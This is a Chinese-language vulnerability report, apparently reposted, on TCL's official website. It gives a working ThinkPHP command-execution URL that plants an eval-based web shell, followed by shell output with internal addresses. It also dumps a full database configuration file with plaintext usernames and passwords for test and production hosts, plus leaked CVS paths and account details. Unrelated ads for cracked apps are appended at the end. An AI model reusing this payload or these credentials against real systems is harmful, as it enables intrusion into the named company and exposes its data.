TCL官网命令执行导致getshell
1. 主站命令执行
是thinkphp的命令执行漏洞,这么久了还没修复,维护人员该打pp了
http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}
直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell
来张图

内网信息
[/var/www/html/tcl/]$ whoami
apache
[/var/www/html/tcl/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth1 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B2
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth2 Link encap:Ethernet HWaddr 40:F2:E9:29:38:D2
inet addr:10.4.22.72 Bcast:10.4.255.255 Mask:255.255.0.0
inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0
TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56145622678 (52.2 GiB) TX bytes:489393736613 (455.7 GiB)
Memory:91580000-915a0000
内网敏感信息泄漏
翻下目录,发现了内网好多信息
1. n多数据库账户密码泄漏
<?php
switch($_SERVER["HTTP_HOST"]) {
case "localhost:8080": { //本机
$db_host = "localhost";
$db_name = "tcl";
$db_user = 'root';
$db_pass = 'root';
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.21.23": { //测试
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';
$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.21.24": { //测试2
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';
$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.72": { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.73": { //正式2
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
default : { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = true;
break;
}
}
?>
2. 附赠子域名站点cvs信息泄漏一枚
http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root
:sspi:mars.ho@source.loko-asia.com:2401/cvsdata
修复方案:
1. 升级
2. 改口令,之前不知道还有没有其他黑客来过,一定要改,那些黑帽黑客绝对不是吃素的
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;

![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)